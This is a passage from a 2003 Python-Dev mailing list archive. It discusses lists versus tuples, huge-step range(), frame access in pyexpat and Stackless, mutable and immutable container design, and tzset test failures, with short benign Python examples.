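    rich = RichSocket(raw)
    try:
        peer.sendall(b"first line\nsecond line\n")
        first = rich.readline()        # delegated to the file object
        fd_ok = rich.fileno() >= 0     # delegated to the socket
        return first, fd_ok
    finally:
        peer.close()
        rich.close()
```

The buffering caveat still applies: once readline() has been used,
mixing in recv() on the same object can miss data held in the buffer.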


Alex


From aleax@aleax.it  Fri Mar 14 08:03:10 2003
From: aleax@aleax.it (Alex Martelli)
Date: Fri, 14 Mar 2003 09:03:10 +0100
Subject: [Python-Dev] Re: lists v. tuples
In-Reply-To: <3E70E55D.1050102@sabaydi.com>
References: <20030312164902.10494.64514.Mailman@mail.python.org> <3E70E55D.1050102@sabaydi.com>
Message-ID: <200303140903.10045.aleax@aleax.it>

On Thursday 13 March 2003 09:09 pm, Kevin J. Butler wrote:
   ...
> The important characteristics of lists are also independent of each
> other (again, IMO on the order):
>
> - mutability of length & content - used for dynamically building
> collections 
> - heterogeneity allowed but not required - used occasionally
> for specific needs

I think some methods must also go on this list of important
characteristics -- the sort method, in particular.  If you need to
sort stuff (including heterogenous stuff, EXCEPT if the latter
includes at least one complex AND at least one other number
of any kind) you put it into a list and sort the list -- that's the
Python way of sorting, and sorting is an often-needed thing.

Sorting plays with mutability by working in-place, but for many
uses it would be just as good if sorting returned a sorted copy
instead -- the key thing here is the sorting, not the mutability.
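
The two styles side by side, as a sketch in modern Python. Note that
the sorted() builtin used here did not exist at the time of this
thread; it was added later, in Python 2.4.

```python
def sort_in_place_and_copy():
    stores = ("grocer", "bakery", "chemist")   # immutable input

    # Copying style: returns a new list and leaves the input alone.
    ordered = sorted(stores)

    # In-place style: needs a mutable list, and sort() returns None.
    shopping = list(stores)
    result = shopping.sort()

    return stores, ordered, shopping, result
```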


Alex


From guido@python.org  Fri Mar 14 12:16:26 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 14 Mar 2003 07:16:26 -0500
Subject: [Python-Dev] More int/long integration issues
In-Reply-To: "Your message of 13 Mar 2003 19:52:15 PST."
 <1047613935.661.119.camel@sayge.arc.nasa.gov>
References: <ur89b1bc4.fsf@boost-consulting.com>
 <20030313164247.GB22296@panix.com>
 <1047587117.660.33.camel@sayge.arc.nasa.gov>
 <200303140253.h2E2r3o01163@pcp02138704pcs.reston01.va.comcast.net>
 <1047613935.661.119.camel@sayge.arc.nasa.gov>
Message-ID: <200303141216.h2ECGQq02022@pcp02138704pcs.reston01.va.comcast.net>

> I've heard others doing number theory work, who hoped or expected it to
> work, as well.  (Typically, they wanted to use HUGE step sizes, for
> example)

As long as they wanted to use longs, that's fair.  E.g. now that we're
trying to get rid of the difference between ints and longs, something
like range(0, 2**100, 2**99) should really just work (and it better
give us [0, 2**99] :-).
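
In modern Python 3 (an assumption about today's interpreter, not the
2.3 code base), this particular case can be checked directly:

```python
def huge_step_range():
    # Start, stop and step are all far beyond the old C long limit.
    return list(range(0, 2**100, 2**99))
```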

> In any case, I'll get the patch submitted fairly soon, for range(). 
> Need to update the tests.

Thanks.  I had hoped to release beta1 before PyCon, but that's not
realistic.  But I'll work on it soon after.

> I'm also coding an irange() for consideration in the itertools module.
> At least an (explicit) replacement for the iteration usage (although,
> maybe not necessary if you actually do the lazy-list in "for" loop
> change.)  If people need the indexing and length operations, too, I can
> only suggest a pure python implementation (which could return an
> irange() iterator when needed).  Is that a dead-end idea, or a starter?

That's something for Raymond H.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From nas@python.ca  Fri Mar 14 15:28:19 2003
From: nas@python.ca (Neil Schemenauer)
Date: Fri, 14 Mar 2003 07:28:19 -0800
Subject: [Python-Dev] More int/long integration issues
In-Reply-To: <200303140253.h2E2r3o01163@pcp02138704pcs.reston01.va.comcast.net>
References: <ur89b1bc4.fsf@boost-consulting.com> <20030313164247.GB22296@panix.com> <1047587117.660.33.camel@sayge.arc.nasa.gov> <200303140253.h2E2r3o01163@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <20030314152819.GA3004@glacier.arctrix.com>

Guido van Rossum wrote:
> > a = 1/1e-5
> > range( a-20, a)
> 
> This should be a TypeError.  I'm sorry it isn't.

At least it gives a DeprecationWarning now.

  Neil


From tismer@tismer.com  Fri Mar 14 15:42:10 2003
From: tismer@tismer.com (Christian Tismer)
Date: Fri, 14 Mar 2003 16:42:10 +0100
Subject: [Python-Dev] Re: lists v. tuples
In-Reply-To: <200303140903.10045.aleax@aleax.it>
References: <20030312164902.10494.64514.Mailman@mail.python.org> <3E70E55D.1050102@sabaydi.com> <200303140903.10045.aleax@aleax.it>
Message-ID: <3E71F851.3030802@tismer.com>

Alex Martelli wrote:
...

> Sorting plays with mutability by working in-place, but for many
> uses it would be just as good if sorting returned a sorted copy
> instead -- the key thing here is the sorting, not the mutability.

And the key assumption for sorting things is that
the things are sortable, which means there
exists an order on the basic set.
Which again suggests that list elements usually
have something in common.

ciao - chris

p.s.: I'm not using a shopping tuple, since I sort
my list by the stores I have to visit. :-)
-- 
Christian Tismer             :^)   <mailto:tismer@tismer.com>
Mission Impossible 5oftware  :     Have a break! Take a ride on Python's
Johannes-Niemeyer-Weg 9a     :    *Starship* http://starship.python.net/
14109 Berlin                 :     PGP key -> http://wwwkeys.pgp.net/
work +49 30 89 09 53 34  home +49 30 802 86 56  pager +49 173 24 18 776
PGP 0x57F3BF04       9064 F4E1 D754 C2FF 1619  305B C09C 5A3B 57F3 BF04
      whom do you want to sponsor today?   http://www.stackless.com/


From tismer@tismer.com  Fri Mar 14 16:35:56 2003
From: tismer@tismer.com (Christian Tismer)
Date: Fri, 14 Mar 2003 17:35:56 +0100
Subject: [Python-Dev] PyEval_GetFrame() revisited
Message-ID: <3E7204EC.60506@tismer.com>

Hi there!

There has been this patch to the threadstate, which
allows overriding the tstate's frame access.

I just saw the part of the patch that modifies
pyexpat:


       f = PyFrame_New(
                       tstate,			/*back*/
                       c,				/*code*/
!                     PyEval_GetGlobals(),	/*globals*/
                       NULL			/*locals*/

where PyEval_GetGlobals() is used instead of
		      tstate->frame->f_globals

Well, this unfortunately is not sufficient
for this module, since pyexpat still *has* direct
access to tstate->frame, in a much worse way:
pyexpat does read and write the frame variable!

In line 326, function call_with_frame, pyexpat
creates a new frame, assigns it to tstate->frame
and later on assigns f->f_back to it.

Reason why I'm thinking about this:
In order to simplify Stackless, I thought to remove
the frame variable, and let it be accessed always
via my current tasklet, which holds the frame.

Looking for the number of necessary patches, I stumbled
over PyExpat, and thought I should better keep my
hands off. Too bad.

Does it make sense to think about an API for
modifying the frame? Or are we at a dead end here?

cheers - chris
-- 
Christian Tismer             :^)   <mailto:tismer@tismer.com>
Mission Impossible 5oftware  :     Have a break! Take a ride on Python's
Johannes-Niemeyer-Weg 9a     :    *Starship* http://starship.python.net/
14109 Berlin                 :     PGP key -> http://wwwkeys.pgp.net/
work +49 30 89 09 53 34  home +49 30 802 86 56  pager +49 173 24 18 776
PGP 0x57F3BF04       9064 F4E1 D754 C2FF 1619  305B C09C 5A3B 57F3 BF04
      whom do you want to sponsor today?   http://www.stackless.com/


From just@letterror.com  Fri Mar 14 16:06:14 2003
From: just@letterror.com (Just van Rossum)
Date: Fri, 14 Mar 2003 17:06:14 +0100
Subject: [Python-Dev] Re: lists v. tuples
In-Reply-To: <3E71F851.3030802@tismer.com>
Message-ID: <r01050400-1023-0BB5B694564011D7A5D1003065D5E7E4@[10.0.0.23]>

Christian Tismer wrote:

> And the key assumption for sorting things is that
> the things are sortable, which means there
> exists an order on the basic set.
> Which again suggests that list elements usually
> have something in common.

To me it suggests that some lists are sortable and others are not...

There's one aspect about this discussion that I haven't seen mentioned
yet: syntax. I think the suggested usages of lists vs. tuples has more
to do with list vs. tuple _syntax_, and less with mutability. From this
perspective it is natural that tuples support a different set of methods
than lists. However, mutable vs. immutable has its uses also, and from
_that_ perspective it is far less understandable that tuples lack
certain methods.

FWIW, I quite like the way how the core classes in Cocoa/NextStep are
designed. For each container-ish object there's a mutable and an immutable
variant, where the mutable variant is usually a subclass of the
immutable one. Examples:
  NSString -> NSMutableString
  NSData -> NSMutableData
  NSArray -> NSMutableArray
  NSDictionary -> NSMutableDictionary

(But then again, Objective-C doesn't have syntax support for lists _or_
tuples...)

Just


From guido@python.org  Fri Mar 14 17:55:22 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 14 Mar 2003 12:55:22 -0500
Subject: [Python-Dev] Re: lists v. tuples
In-Reply-To: "Your message of Fri, 14 Mar 2003 17:06:14 +0100."
 <r01050400-1023-0BB5B694564011D7A5D1003065D5E7E4@[10.0.0.23]>
References: <r01050400-1023-0BB5B694564011D7A5D1003065D5E7E4@[10.0.0.23]>
Message-ID: <200303141755.h2EHtMA03501@pcp02138704pcs.reston01.va.comcast.net>

> FWIW, I quite like the way how the core classes in Cocoa/NextStep are
> designed. For each container-ish object there's a mutable and an immutable
> variant, where the mutable variant is usually a subclass of the
> immutable one. Examples:
>   NSString -> NSMutableString
>   NSData -> NSMutableData
>   NSArray -> NSMutableArray
>   NSDictionary -> NSMutableDictionary

This has its downside too though.  A function designed to take an
immutable class instance cannot rely on the class instance to remain
unchanged, because the caller could pass it an instance of the
corresponding mutable subclass!  (For example, the function might use
the argument as a dict key.)  In some sense this inheritance pattern
breaks the "Liskov substitutability" principle: if B is a base class
of C, whenever a B instance is expected, a C instance may be used.
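
A sketch of the dict-key hazard in Python terms. The Point and
MutablePoint classes are invented for illustration and only mirror the
immutable-base / mutable-subclass layout described above.

```python
class Point:
    """Meant to be immutable: equality and hash depend on the value."""
    def __init__(self, x, y):
        self._x, self._y = x, y

    def _key(self):
        return (self._x, self._y)

    def __eq__(self, other):
        return isinstance(other, Point) and self._key() == other._key()

    def __hash__(self):
        return hash(self._key())

class MutablePoint(Point):
    def move(self, dx, dy):
        self._x += dx
        self._y += dy

def remember(cache, point):
    # Written against Point, so it assumes the key never changes.
    cache[point] = "seen"

def dict_key_demo():
    cache = {}
    p = MutablePoint(1, 2)
    remember(cache, p)
    found_before = p in cache
    p.move(10, 0)             # the caller mutates the "immutable" key
    found_after = p in cache  # hash no longer matches the stored slot
    return found_before, found_after, len(cache)
```

The entry is still in the dict, but after the move it can no longer be
looked up by its own key.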

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tismer@tismer.com  Fri Mar 14 18:05:05 2003
From: tismer@tismer.com (Christian Tismer)
Date: Fri, 14 Mar 2003 19:05:05 +0100
Subject: [Python-Dev] PyEval_GetFrame() revisited
In-Reply-To: <3E7204EC.60506@tismer.com>
References: <3E7204EC.60506@tismer.com>
Message-ID: <3E7219D1.6090306@tismer.com>

Christian Tismer wrote:
> Hi there!
> 
> There has been this patch to the threadstate, which
> allows overriding the tstate's frame access.
> 
> I just saw the part of the patch that modifies
> pyexpat:
> 
> 
>       f = PyFrame_New(
>                       tstate,            /*back*/
>                       c,                /*code*/
> !                     PyEval_GetGlobals(),    /*globals*/
>                       NULL            /*locals*/
> 
> where PyEval_GetGlobals() is used instead of
>               tstate->frame->f_globals
> 
> Well, this unfortunately is not sufficient
> for this module, since pyexpat still *has* direct
> access to tstate->frame, in a much worse way:
> pyexpat does read and write the frame variable!

Ah!!
Can it be that PyEval_GetFrame() is just intended
to signal to an extension like Psyco that it needs
to quickly invent a frame now?
So it is *not* meant to be a complete interface
for no longer accessing tstate->frame explicitly;
it is only meant for read access?

So I can't move it elsewhere and probably need
to work around that forever, unless we also
write PyEval_SetFrame()
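
As a loose Python-level analogy only: sys._getframe() gives the same
kind of read-only view of the current frame. It is CPython-specific,
and the sketch below says nothing about how the C API is implemented.
The function names are made up.

```python
import sys

def current_frame_info():
    frame = sys._getframe()     # the frame executing this function
    caller = frame.f_back       # the frame that called us
    return (
        frame.f_code.co_name,
        caller.f_code.co_name,
        frame.f_globals is globals(),
    )

def outer():
    return current_frame_info()
```

There is no matching Python-level call for installing a different
frame as the current one, which is the gap being discussed here.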

sigh - ciao - chris
-- 
Christian Tismer             :^)   <mailto:tismer@tismer.com>
Mission Impossible 5oftware  :     Have a break! Take a ride on Python's
Johannes-Niemeyer-Weg 9a     :    *Starship* http://starship.python.net/
14109 Berlin                 :     PGP key -> http://wwwkeys.pgp.net/
work +49 30 89 09 53 34  home +49 30 802 86 56  pager +49 173 24 18 776
PGP 0x57F3BF04       9064 F4E1 D754 C2FF 1619  305B C09C 5A3B 57F3 BF04
      whom do you want to sponsor today?   http://www.stackless.com/


From fdrake@acm.org  Fri Mar 14 19:07:37 2003
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Fri, 14 Mar 2003 14:07:37 -0500
Subject: [Python-Dev] PyEval_GetFrame() revisited
In-Reply-To: <3E7204EC.60506@tismer.com>
References: <3E7204EC.60506@tismer.com>
 <3E7219D1.6090306@tismer.com>
Message-ID: <15986.10361.70059.323966@grendel.zope.com>

Christian Tismer writes:
 > Hi there!

Good afternoon!

 > There has been this patch to the threadstate, which
 > allows overriding the tstate's frame access.
...
 > Reason why I'm thinking about this:
 > In order to simplify Stackless, I thought to remove
 > the frame variable, and let it be accessed always
 > via my current tasklet, which holds the frame.
 > 
 > Looking for the number of necessary patches, I stumbled
 > over PyExpat, and thought I should better keep my
 > hands off. Too bad.
 > 
 > Does it make sense to think about an API for
 > modifying the frame? Or are we at a dead end here?

What's being modified isn't the frame but the tstate, but it may be
reasonable to provide some API to manipulate the "current" frame.

I think pyexpat is unique in doing this, but it actually makes a lot
of sense; there are other modules for which a similar behavior is
likely to be appropriate (one example I can think of is Fredrik's
sgmlop module).

What pyexpat is trying to achieve is fairly simple, and I don't think
there's a better way currently.  When Python code calls the Parse() or
ParseFile() method of a parser object (returned from
pyexpat.ParserCreate()), the parser can generate many different
callbacks into Python code.  pyexpat generates an artificial code
object and frame that can be used to generate more useful tracebacks
when exceptions are raised within callbacks; the code object indicates
which callback Expat triggered, separately from the function assigned
to handle that callback.  This makes it much easier to debug handler
functions.
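
A small sketch of the situation from the Python side, using the
xml.parsers.expat module in modern Python 3. The handler and the
sample document are made up; exactly which extra frames show up in the
traceback depends on the interpreter version, so the sketch only
collects the frame names and does not assume them.

```python
import traceback
import xml.parsers.expat

def parse_with_failing_handler():
    def on_start(name, attrs):
        # A handler bug or a deliberate rejection of the input.
        if name == "bad":
            raise ValueError("handler rejected <%s>" % name)

    parser = xml.parsers.expat.ParserCreate()
    parser.StartElementHandler = on_start
    try:
        parser.Parse("<doc><ok/><bad/></doc>", True)
    except ValueError as exc:
        # The exception travels from the callback back out of Parse().
        frames = [f.name for f in traceback.extract_tb(exc.__traceback__)]
        return str(exc), frames
    return None, []
```

Printing the returned frame names shows what sits between the Parse()
call and the handler on a given interpreter.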

If there were API functions to get/set the frame, pyexpat wouldn't
need to poke into the tstate at all.  Would that alleviate the
difficulties this creates for Stackless / Psyco?


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Zope Corporation


From zooko@zooko.com  Fri Mar 14 19:09:02 2003
From: zooko@zooko.com (Zooko)
Date: Fri, 14 Mar 2003 14:09:02 -0500
Subject: [Python-Dev] mutability (was: lists v. tuples)
In-Reply-To: Message from Guido van Rossum <guido@python.org>
 of "Fri, 14 Mar 2003 12:55:22 EST." <200303141755.h2EHtMA03501@pcp02138704pcs.reston01.va.comcast.net>
References: <r01050400-1023-0BB5B694564011D7A5D1003065D5E7E4@[10.0.0.23]>  <200303141755.h2EHtMA03501@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <E18tuYA-0007f1-00@localhost>

 GvR wrote:
>
> This has its downside too though.  A function designed to take an
> immutable class instance cannot rely on the class instance to remain
> unchanged, because the caller could pass it an instance of the
> corresponding mutable subclass!  (For example, the function might use
> the argument as a dict key.)  In some sense this inheritance pattern
> breaks the "Liskov substitutability" principle: if B is a base class
> of C, whenever a B instance is expected, a C instance may be used.

Indeed!

Presumably the designers of the NextStep libraries thought to themselves that 
they couldn't do it the other way (have NSArray subclass NSMutableArray) because 
NSArray couldn't provide a real implementation of a mutation method like 
"NSArray addObject".

If you include the immutability guarantee as well as the methods in the
"contract" offered by an interface, then it's clear that neither can be a
Liskov-substitution-principle-preserving subtype of the other.

The E Language paid careful attention to this issue because a surprise about 
mutability could easily be a security hole.  Their solution is quite Pythonic, 
inasmuch as type-checking is dynamic, structural (an object matches a type if it 
offers the interface regardless of whether it is explicitly declared to be a 
subtype), and soft (an object can implement only part of a type).

These are the three noble features of Python's type system.  (I occasionally 
hear about efforts to cripple Python's type system in order to make it as 
ungainly as Java's, but fortunately they always seem to fade away...)

So in E, it's the same: if you are expecting a mutable list (a "FlexList") and 
you get an immutable one, you'll get an exception at run-time if you try a 
mutation operation like mylist.append("spam").

Like Python, E's strings do the right thing if you invoke immutable list 
("ConstList") methods on them.

The syntax for constructing maps and lists and indexing them is similar to 
Python's.  That syntax always constructs immutable structures, a mutable version 
of which is generated with the method "mylist.diverge()".  To get an immutable 
version of a mutable structure, you write "mylist.snapshot()".

http://erights.org/elang/quick-ref.html#Structures
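
A rough Python analogy, not E code: tuple and list play the roles of
ConstList and FlexList, and the helper names diverge() and snapshot()
are borrowed from the description above purely for illustration.

```python
def diverge(const_list):
    # Mutable copy of an immutable sequence.
    return list(const_list)

def snapshot(flex_list):
    # Immutable copy of a mutable sequence.
    return tuple(flex_list)

def mutability_demo():
    const = (1, 2, 3)
    flex = diverge(const)
    flex.append("spam")          # fine on the mutable copy
    frozen = snapshot(flex)

    # Mutating the immutable version fails at run time, not earlier.
    try:
        frozen.append("eggs")
    except AttributeError:
        mutation_failed = True
    else:
        mutation_failed = False
    return const, flex, frozen, mutation_failed
```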

Regards,

Zooko

http://zooko.com/
         ^-- newly and incompletely restored


From just@letterror.com  Fri Mar 14 19:12:06 2003
From: just@letterror.com (Just van Rossum)
Date: Fri, 14 Mar 2003 20:12:06 +0100
Subject: [Python-Dev] Re: lists v. tuples
In-Reply-To: <200303141755.h2EHtMA03501@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <r01050400-1023-DAFB3F86565011D7A5D1003065D5E7E4@[10.0.0.23]>

Guido van Rossum wrote:

> > FWIW, I quite like the way how the core classes in Cocoa/NextStep
> > are designed. For each container-ish object there's a mutable and an
> > immutable variant, where the mutable variant is usually a subclass
> > of the immutable one. Examples:
> >   NSString -> NSMutableString
> >   NSData -> NSMutableData
> >   NSArray -> NSMutableArray
> >   NSDictionary -> NSMutableDictionary
> 
> This has its downside too though.  A function designed to take an
> immutable class instance cannot rely on the class instance to remain
> unchanged, because the caller could pass it an instance of the
> corresponding mutable subclass!  (For example, the function might use
> the argument as a dict key.)  In some sense this inheritance pattern
> breaks the "Liskov substitutability" principle: if B is a base class
> of C, whenever a B instance is expected, a C instance may be used.

I'm not sure how much relevance this principle has in a language in
which the inheritance tree has little meaning, but since I _am_ sure you
read more books about this than I did, I'll take your word for it ;-)

It's not so much the inheritance hierarchy that I like about the Cocoa
core classes, but the fact that mutability is a prominent part of the
design. I think Python would be a better language if it had a mutable
string type as well as a mutable byte-oriented data type. An immutable
dict would be handy at times. An immutable list type would be great,
too. Wait, we already have that.

Sure, tuples are often used for struct-like things and lists for that
other stuff <wink>, but I don't think it's right to say you _must_ use
them like that, and that seeing/using tuples as immutable lists is
_wrong_.

Just


From guido@python.org  Fri Mar 14 19:26:10 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 14 Mar 2003 14:26:10 -0500
Subject: [Python-Dev] Re: lists v. tuples
In-Reply-To: "Your message of Fri, 14 Mar 2003 20:12:06 +0100."
 <r01050400-1023-DAFB3F86565011D7A5D1003065D5E7E4@[10.0.0.23]>
References: <r01050400-1023-DAFB3F86565011D7A5D1003065D5E7E4@[10.0.0.23]>
Message-ID: <200303141926.h2EJQBA04239@pcp02138704pcs.reston01.va.comcast.net>

> Sure, tuples are often used for struct-like things and lists for
> that other stuff <wink>, but I don't think it's right to say you
> _must_ use them like that, and that seeing/using tuples as immutable
> lists is _wrong_.

It's not wrong, but I find that many people use tuples in situations
where they should really use lists, and the immutability is
irrelevant.  Using tuples seems to be a reflex for some people because
creating a tuple saves a microsecond or so.  That sounds like the
wrong thing to let inform your reflexes...

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mcherm@mcherm.com  Fri Mar 14 20:13:39 2003
From: mcherm@mcherm.com (Chermside, Michael)
Date: Fri, 14 Mar 2003 15:13:39 -0500
Subject: [Python-Dev] Re: lists v. tuples
Message-ID: <7F171EB5E155544CAC4035F0182093F04211EE@INGDEXCHSANC1.ingdirect.com>

Just writes:
> It's not so much the inheritance hierarchy that I like about the Cocoa
> core classes, but the fact that mutability is a prominent part of the
> design. I think Python would be a better language if it had a mutable
> string type as well as a mutable byte-oriented data type. An immutable
> dict would be handy at times. An immutable list type would be great,
> too. Wait, we already have that.

I've often had the same thought myself. I'm imagining designing my
own language, and I note that both mutable and immutable strings are
handy, depending on what you're doing. The same is true of data
containers (of all sorts, lists and dicts being examples). "What the
heck?" I say to myself, "In *my* perfect language, there'll be
mutable and immutable versions of every object. (With the obvious
conversion behavior.) Why, you won't even have to code them
separately... just specify some property indicating whether or not
that instance is mutable."

Then I realize that C++ has exactly this feature (it's called "const"),
and that I find it to be an annoyance far more often than I find it
handy. And I begin to question.

Wish-I-knew-the-answer-but-I-haven't-been-enlightened-yet

-- Michael Chermside


From tismer@tismer.com  Fri Mar 14 23:29:26 2003
From: tismer@tismer.com (Christian Tismer)
Date: Sat, 15 Mar 2003 00:29:26 +0100
Subject: [Python-Dev] PyEval_GetFrame() revisited
In-Reply-To: <15986.10361.70059.323966@grendel.zope.com>
References: <3E7204EC.60506@tismer.com>	<3E7219D1.6090306@tismer.com> <15986.10361.70059.323966@grendel.zope.com>
Message-ID: <3E7265D6.3050202@tismer.com>

Fred L. Drake, Jr. wrote:
> Christian Tismer writes:
...

>  > Does it make sense to think about an API for
>  > modifying the frame? Or are we at a dead end here?
> 
> What's being modified isn't the frame but the tstate, but it may be
> reasonable to provide some API to manipulate the "current" frame.

That was what I intended to say.

> I think pyexpat is unique in doing this, but it actually makes a lot
> of sense; there are other modules for which a similar behavior is
> likely to be appropriate (one example I can think of is Fredrik's
> sgmlop module).

I just looked into MHammond's files and found AXDebug.cpp reading
tstate's frame, too, line 192:

	PyFrameObject *frame = state ? state->frame : NULL;

Would be another candidate to use PyEval_GetFrame().

> What pyexpat is trying to achieve is fairly simple, and I don't think
> there's a better way currently.  When Python code calls the Parse() or
> ParseFile() method of a parser object (returned from
> pyexpat.ParserCreate()), the parser can generate many different
> callbacks into Python code.  pyexpat generates an artificial code
> object and frame that can be used to generate more useful tracebacks
> when exceptions are raised within callbacks; the code object indicates
> which callback Expat triggered, separately from the function assigned
> to handle that callback.  This makes it much easier to debug handler
> functions.

Yes, this makes very much sense, to just wrap a frame around
something to get useful tracebacks.

> If there were API functions to get/set the frame, pyexpat wouldn't
> need to poke into the tstate at all.  Would that alleviate the
> difficulties this creates for Stackless / Psyco?

I think so.
For internal functions, inside the main Python implementation,
it is no problem to maintain a number of patches, or to even
use interface functions where they make sense, like enabling
Psyco.
For external modules, it would be nicer if certain implementation
details could be hidden, to give more freedom to implement
something differently, without breaking unknown modules.
PyExpat is in a grey zone, since it is already in the
Python distribution, and I had no problem to patch it.

The reason why I'm asking is that in Stackless 2.0 and above,
tstate is always carrying a so-called tasklet object which
holds the current frame. There can be many of these, while
there is only one current one per tstate, and they
can be switched at certain times. At the moment, I always have
to take care to preserve a valid tstate->frame variable,
whenever I'm switching tasklets. It would make the code much
smaller and cleaner, if I could simply redefine the current
frame to be just the frame held in the current tasklet.

Something like PyEval_SetFrame() would make sense, but there is
a problem with the protocol: After changing the frame, the
currently running interpreter would not know to execute it,
but continue to run the running one.
For normal Python, PyEval_SetFrame() would only make sense,
if the calling code would also make sure that the new frame
is run, or popped off after a special action was done.

PyExpat, as I understand, uses this frame just as a wrapper
for the case of an exception, when the frame would be used
only when a failing function returns NULL.
Stackless extends this and also knows to return a special
value instead of NULL, in order to tell the calling
interpreter to stop its action and let the new frame run.

Even in PyExpat's use, it would be hard to explain the use
of such a function, I fear. But I'd really like to have it.

cheers - chris

-- 
Christian Tismer             :^)   <mailto:tismer@tismer.com>
Mission Impossible 5oftware  :     Have a break! Take a ride on Python's
Johannes-Niemeyer-Weg 9a     :    *Starship* http://starship.python.net/
14109 Berlin                 :     PGP key -> http://wwwkeys.pgp.net/
work +49 30 89 09 53 34  home +49 30 802 86 56  pager +49 173 24 18 776
PGP 0x57F3BF04       9064 F4E1 D754 C2FF 1619  305B C09C 5A3B 57F3 BF04
      whom do you want to sponsor today?   http://www.stackless.com/


From tim.one@comcast.net  Sat Mar 15 03:00:46 2003
From: tim.one@comcast.net (Tim Peters)
Date: Fri, 14 Mar 2003 22:00:46 -0500
Subject: [Python-Dev] tzset
Message-ID: <LNBBLJKPBEHFEDALKOLCOEDBEBAB.tim.one@comcast.net>

We seem to have added tzset() gimmicks to CVS Python.

test_time now fails on Windows, simply because time.tzset raises
AttributeError there.

Now Windows does support tzset(), but not TZ values of the form
test_time.test_tzset() is testing, like

                environ['TZ'] = 'US/Eastern'
and
            environ['TZ'] = 'Australia/Melbourne'

The rub here is that I haven't found *any* tzset man pages on the web that
claim TZ accepts such values (other than to silently ignore them because
they're not in a recognized format).  The POSIX defn is typical:

  http://www.opengroup.org/onlinepubs/007904975/basedefs/xbd_chap08.html

and search down for TZ.  There's no way to read that as supporting the
values we're testing.

Anyone have a clue?

not-all-pits-should-be-dived-into-ly y'rs  - tim


From zen@shangri-la.dropbear.id.au  Sat Mar 15 06:34:26 2003
From: zen@shangri-la.dropbear.id.au (Stuart Bishop)
Date: Sat, 15 Mar 2003 17:34:26 +1100
Subject: [Python-Dev] tzset
In-Reply-To: <LNBBLJKPBEHFEDALKOLCOEDBEBAB.tim.one@comcast.net>
Message-ID: <2ADB787D-56B0-11D7-9648-000393B63DDC@shangri-la.dropbear.id.au>

On Saturday, March 15, 2003, at 02:00  PM, Tim Peters wrote:

> We seem to have added tzset() gimmicks to CVS Python.

That was my patch.

> test_time now fails on Windows, simply because time.tzset raises
> AttributeError there.

test_time.test_tzset should only be run if time.tzset is defined
(which should only be there if configure determines that tzset works
with the TZ formats we are testing). Feel like adding a clause at the
top of test_tzset to skip the test if time.tzset is not defined, or
should I submit a patch?
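
A rough sketch of such a guard, written against today's unittest
(skipUnless did not exist in 2003, so this is not the patch that went
in). The class name TzsetTest and the helper run_suite are invented
for the example:

```python
import time
import unittest


class TzsetTest(unittest.TestCase):
    # Skip instead of failing with AttributeError where time.tzset is missing.
    @unittest.skipUnless(hasattr(time, "tzset"),
                         "time.tzset is not available on this platform")
    def test_tzset_is_callable(self):
        self.assertTrue(callable(time.tzset))


def run_suite():
    """Run the test case and return the unittest.TestResult."""
    suite = unittest.defaultTestLoader.loadTestsFromTestCase(TzsetTest)
    result = unittest.TestResult()
    suite.run(result)
    return result


result = run_suite()
print(result.wasSuccessful(), len(result.skipped))
```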

> Now Windows does support tzset(), but not TZ values of the form
> test_time.test_tzset() is testing, like
>
>                 environ['TZ'] = 'US/Eastern'
> and
>             environ['TZ'] = 'Australia/Melbourne'
>
> The rub here is that I haven't found *any* tzset man pages on the web
> that claim TZ accepts such values (other than to silently ignore them
> because

It specifies the pathname to a tzfile(5) format file, relative to
an OS-defined default. From BSD:
     If its value does not begin with a colon, it is first used as
     the pathname of a file (as described above) from which to
     read the time conversion information.  If that file cannot be
     read, the value is then interpreted as a direct specification
     (the format is described below) of the time conversion
     information.
Solaris has a similar definition. Linux documents this format as
needing to start with a ':' but accepts it (at least I think I
tested this...)

To me, this is the useful format as all the others require you to
know your DST transition times rather than rely on the OS to supply them.
At the moment if the 'path to a tzfile(5)' format is not accepted, your
tzset(3) is considered broken and time.tzset not built.

I'm happy to rewrite the detection in configure.in and the test in
test_time.py to lower the bar on this, but I think a better solution
may be to determine if Windows has a format that lets us do DST
calculations and keep the bar high. I was hoping that such a format
would a) exist and b) Allow translation between the Unix standard of
Country/Region to whatever-windows-uses.

> not-all-pits-should-be-dived-into-ly y'rs  - tim

but-i-was-pushed-by-those-damn-politicians-ly y'rs

-- 
Stuart Bishop <zen@shangri-la.dropbear.id.au>
http://shangri-la.dropbear.id.au/


From drifty@alum.berkeley.edu  Sat Mar 15 06:40:16 2003
From: drifty@alum.berkeley.edu (Brett Cannon)
Date: Fri, 14 Mar 2003 22:40:16 -0800 (PST)
Subject: [Python-Dev] tzset
In-Reply-To: <2ADB787D-56B0-11D7-9648-000393B63DDC@shangri-la.dropbear.id.au>
References: <2ADB787D-56B0-11D7-9648-000393B63DDC@shangri-la.dropbear.id.au>
Message-ID: <Pine.SOL.4.53.0303142237290.4751@death.OCF.Berkeley.EDU>

[Stuart Bishop]

<snip>
> I'm happy to rewrite the detection in configure.in and the test in
> test_time.py to lower the bar on this, but I think a better solution
> may be to determine if Windows has a format that lets us do DST
> calculations and keep the bar high. I was hoping that such a format
> would a) exist and b) Allow translation between the Unix standard of
> Country/Region to whatever-windows-uses.
>

If there is one thing I have learned from writing _strptime, it is that
you cannot be strict in the slightest about your input when it comes to
time-based data.  I think this is another case where you need to be loose
about input and strict with output.

-Brett


From aleax@aleax.it  Sat Mar 15 07:57:53 2003
From: aleax@aleax.it (Alex Martelli)
Date: Sat, 15 Mar 2003 08:57:53 +0100
Subject: [Python-Dev] Re: lists v. tuples
In-Reply-To: <3E71F851.3030802@tismer.com>
References: <20030312164902.10494.64514.Mailman@mail.python.org> <200303140903.10045.aleax@aleax.it> <3E71F851.3030802@tismer.com>
Message-ID: <200303150857.53214.aleax@aleax.it>

On Friday 14 March 2003 04:42 pm, Christian Tismer wrote:
> Alex Martelli wrote:
> ...
>
> > Sorting plays with mutability by working in-place, but for many
> > uses it would be just as good if sorting returned a sorted copy
> > instead -- the key thing here is the sorting, not the mutability.
>
